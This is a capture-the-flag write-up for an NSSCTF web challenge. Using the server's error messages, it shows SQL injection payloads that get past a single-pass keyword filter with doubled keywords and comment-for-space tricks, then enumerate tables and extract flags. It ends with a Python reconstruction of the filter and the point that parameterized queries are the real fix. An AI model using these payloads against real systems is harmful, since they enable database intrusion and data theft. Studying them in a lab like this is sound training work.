Challenge link

Page content

Young web hand!
You can tell what to do just from the challenge name, right~
Pass the parameter in a relatively safe way.
Oh right, the parameter is nss

The parameter is nss. Sending it via GET has no effect; POST with nss=1 succeeds and returns:

Flag: NSSCTF{This_1s_F4ke_flag}
This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

Injection

  • Try a union-based injection

    > nss=-1' union select 1,2%23
    < You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'select1,2#' LIMIT 0,1' at line 1

    The error text shows that both the spaces and the keyword `union` have been stripped from the input (what reached the server was `select1,2#`), and that the application appends its own `LIMIT 0,1` after the quoted value.

    Bypass: replace spaces with inline comments (`/**/`) and double-write the keyword (`ununionion`), so that deleting the inner `union` leaves a working `union` behind. It succeeds:

    > nss=-1'/**/ununionion/**/select/**/1,2,3%23
    < Flag: NSSCTF{This_1s_F4ke_flag}
    This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

    # View the second row: the trailing '#' comments out the app's LIMIT 0,1,
    # so the injected 'limit 1,1' selects the row coming from our select
    > nss=-1'/**/ununionion/**/select/**/1,2,3/**/limit/**/1,1%23
    < Flag: 2
    This is true flag: 3
  • Continue with the usual enumeration workflow

    Note that `or` is filtered as well, so `information_schema` must be written as `infoorrmation_schema` (the single-pass filter removes the inner `or` and leaves `information`):

    > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23
    < Flag: 2
    This is true flag: NSS_tb,users

    > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'/**/limit/**/1,1%23

    < Flag: 2
    This is true flag: id,Secr3t,flll444g


    > nss=-1'/**/ununionion/**/select/**/id,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_db.NSS_tb/**/limit/**/1,1%23

    < Flag: NSSCTF{b3c1613c-6acb-46f4-9510-f3184bd69eb5}
    This is true flag: NSSCTF{I_d0nt_want_t0_w4ke_up}
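As an added example (not code from this writeup or from the challenge itself), the filter behaviour inferred above reconstructed in Python: a single pass that deletes `union`, `or` and spaces once each. The challenge source is not shown, so the blacklist, case-insensitive matching, the `id` column in the WHERE clause and the exact query shape are assumptions inferred from the MariaDB error message; table and column names are the ones enumerated above. The block also shows the iterated variant of the same filter, which defeats the double-keyword trick, so you can see why `ununionion` works here and where it stops working.

```python
import re
from urllib.parse import unquote

# Blacklist reconstructed from what the writeup observed (assumption: the
# challenge source is not shown). Case-insensitive matching is also assumed.
BLACKLIST = ("union", "or", " ")


def single_pass_filter(value: str) -> str:
    """Naive WAF: delete every blacklisted token once, one token at a time.

    Deleting the inner 'union' from 'ununionion' leaves a fresh 'union'
    behind, and deleting 'or' from 'infoorrmation' leaves 'information',
    which is exactly why the doubled keywords in the writeup get through.
    """
    for token in BLACKLIST:
        value = re.sub(re.escape(token), "", value, flags=re.IGNORECASE)
    return value


def iterated_filter(value: str) -> str:
    """Hardened variant: repeat the pass until the input stops changing,
    so a keyword re-formed by a deletion is removed on the next round."""
    while True:
        stripped = single_pass_filter(value)
        if stripped == value:
            return value
        value = stripped


def build_query(nss: str, waf=single_pass_filter) -> str:
    """Assumed server-side query, inferred from the MariaDB error
    "... near 'select1,2#' LIMIT 0,1'": the value is URL-decoded, filtered,
    spliced into single quotes and followed by the app's own LIMIT 0,1.
    Filtering on the 'id' column is an assumption."""
    return (
        "SELECT id,Secr3t,flll444g FROM NSS_tb "
        f"WHERE id='{waf(unquote(nss))}' LIMIT 0,1"
    )


def survives(nss: str, waf=single_pass_filter) -> bool:
    """True when a UNION keyword is still present after filtering."""
    return "union" in waf(unquote(nss)).lower()


# Payloads taken from the writeup (plus the original failed attempt) so the
# effect of the two filter variants can be compared side by side.
PAYLOADS = [
    "-1' union select 1,2%23",
    "-1'/**/ununionion/**/select/**/1,2,3%23",
    "-1'/**/ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/"
    "infoorrmation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print("payload :", p)
        print("1 pass  :", build_query(p))
        print("iterated:", build_query(p, iterated_filter))
        print()
```

Running the block prints, for each payload, the query a single-pass filter would hand to MariaDB next to the one an iterated filter would produce: the first attempt collapses to `'-1'select1,2#'` (matching the error on the page), the doubled-keyword payloads come out with a clean `union` and `information_schema` under the naive filter, and lose them again under the iterated one. The practical takeaway for the defensive side is that keyword deletion is not a fix at all; a parameterized query makes the `nss` value data rather than SQL and needs none of this.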